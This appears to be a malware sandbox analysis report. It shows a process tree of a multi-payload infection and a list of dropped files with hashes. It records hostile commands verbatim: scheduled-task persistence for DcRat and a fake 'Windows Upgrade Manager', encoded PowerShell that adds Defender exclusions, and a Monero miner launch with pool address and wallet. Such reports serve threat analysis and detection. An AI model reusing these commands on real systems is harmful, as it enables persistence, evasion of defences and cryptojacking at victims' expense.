                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe"
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:8764
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 8764 -s 476
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                            PID:8512
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Files\flesh.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Files\flesh.exe"
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:8976
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe"
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:6336
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\123.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\123.exe"
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:8220
                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  powershell "" "Get-WmiObject Win32_PortConnector"
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:2280
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Files\Temp3.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\Temp3.exe"
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:8232
                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                                                                                      "schtasks" /create /tn "Update" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\Temp3.exe" /rl HIGHEST /f
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                      • DcRat
                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                      PID:5656
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\SubDir\Windows Security Client.exe
                                                                                                                                                                                                                                                      "C:\Windows\SysWOW64\SubDir\Windows Security Client.exe"
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:6792
                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                                                                                          "schtasks" /create /tn "Update" /sc ONLOGON /tr "C:\Windows\SysWOW64\SubDir\Windows Security Client.exe" /rl HIGHEST /f
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                          • DcRat
                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                          PID:9140
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\toolspub1.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\toolspub1.exe"
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:7004
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe"
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:6020
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe"
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:6340
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\WinlockerBuilderv5.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\WinlockerBuilderv5.exe"
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:6924
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\jusched.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\jusched.exe"
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:7156
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\svshost.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\svshost.exe"
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:3324
                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:1576
                                                                                                                                                                                                                                                                • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                                                  C:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:5564
                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:6032
                                                                                                                                                                                                                                                                    • C:\Windows\System32\notepad.exe
                                                                                                                                                                                                                                                                      C:\Windows\System32\notepad.exe
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                      PID:5124
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    PID:4132
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                    PID:5056
                                                                                                                                                                                                                                                                  • C:\Windows\System32\werfault.exe
                                                                                                                                                                                                                                                                    \??\C:\Windows\System32\werfault.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                    PID:2128
                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                    powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABTAHQAcgBpAG4AZwBJAGQAcwAuAGUAeABlADsA
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                    PID:2292
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\escgwhs
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\escgwhs
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                    PID:4140
                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                    ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                                                                    PID:2696
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Detail\vejmmultl\StringIds.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Detail\vejmmultl\StringIds.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                    PID:2664
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Detail\vejmmultl\StringIds.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Detail\vejmmultl\StringIds.exe
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                      PID:2792
                                                                                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                        PID:2696
                                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                            PID:1468
                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                      powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABTAHQAcgBpAG4AZwBJAGQAcwAuAGUAeABlADsA
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:32
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\fzdbyrqea.exe
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\fzdbyrqea.exe
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                        PID:4960
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\fzdbyrqea.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\fzdbyrqea.exe
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          PID:4104
                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBlAHMAcwBhAGcAZQBcAFMAdQBwAHAAbwByAHQAcwBEAHkAbgBhAG0AaQBjAFAAYQByAHQAaQB0AGkAbwBuAHMALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUAIAAtAEYAbwByAGMAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AZQBzAHMAYQBnAGUAXABTAHUAcABwAG8AcgB0AHMARAB5AG4AYQBtAGkAYwBQAGEAcgB0AGkAdABpAG8AbgBzAC4AZQB4AGUA
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:4332
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                          PID:1700
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                            PID:4664
                                                                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                              PID:4492
                                                                                                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                  PID:3972
                                                                                                                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
                                                                                                                                                                                                                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4BBSeeCcr5wHcnUb8nD4AmBTU39d2dELQiDDTAamz1iWT7GjRdpsZi38VpMH48oY9VYwUdBgTCYshjQGRuu6mcoH1fE9LC5.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                      PID:6104
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Eszop.exe
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Eszop.exe
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              PID:1772
                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                              PID:3464
                                                                                                                                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                              PID:1428
                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                              PID:5092
                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                              PID:3484
                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                              PID:3644
                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                              PID:5248
                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                              PID:5348
                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                              PID:5884
                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                              PID:5680
                                                                                                                                                                                                                                                                            • C:\Users\Admin\Windows Upgrade\wupgrdsv.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\Windows Upgrade\wupgrdsv.exe"
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                              PID:6028
                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                              PID:5660
                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:7160

                                                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                                                                              • C:\ProgramData\Are.docx

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                11KB

                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                a33e5b189842c5867f46566bdbf7a095

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                e1c06359f6a76da90d19e8fd95e79c832edb3196

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

                                                                                                                                                                                                                                                                              • C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                832KB

                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                715cd5ca3feed0477cb153b3bea9f607

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                c3b54f7446d45ab3b01576dd1f2b73f4795f5ee0

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                f21a5fa435a5a363f171a0b54e73c5715cb2853756cc12cd171b4da1ef64bb08

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                0e9e85d5eb66ce20d74adcea03d48721dc59676334f0b367c08b6d417e1f24b1beced9dad183a50e99d4826a9b7bac2f612bb562da6f1f7cf9cc56b67493122a

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Detail\vejmmultl\StringIds.exe

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                885KB

                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                0ea11d5050bccac4305a57931d723f68

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                bf7bce111d6359ada624a7c781957ba2cb26b66b

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                8f8f2cde6e6757cd7a87a277846e4c62115bd3f0fc6c97fdf63be1bb3c51712b

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                9fac9dd771dec64c724473964e7b480f564ad3ad1393989d65cc4a75bd26208b3b6d7d6ec004f35890ef263dbd215b11f219469b3f34e21b99cb2d158433f2fd

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                40B

                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                95e4710f740e28c7593bfdc1de7ae263

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                b37b6558db0bad67426af341b603c8343526bf14

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                75d18f95b2b5c62f2343231369e5649c5c515b9211cfcf91e120831b61bbb2a6

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                fa6d1ac85a277aba85267199c0aef0968932fc8e534cd834c432fb192f2b0ce423864f03c352514203ed4236ab9782dd0dc14923ff206143f31d6f60674d68ef

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                5KB

                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                a0b78a3039a046256d42ca872f8a0bff

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                539d2b6457d50853c39fcb1550f8cdd4956112cb

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                4d663813f5e1a742c46d512593df0b5a59f81755e6384156a2f8e59270cf257e

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                bdc09f3f4420160d228c2c5c7d64604fb1ef50dcd2ff6bd8861d97e2334ca75e7c45383e7bf98b3ca7388d210867a425f79d1a0cdd97efc499fcb9cbda5ff4be

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                5KB

                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                fab5d9e92c54f061bdd8f73345184030

                                                                                                                                                                                                                                                                                SHA1

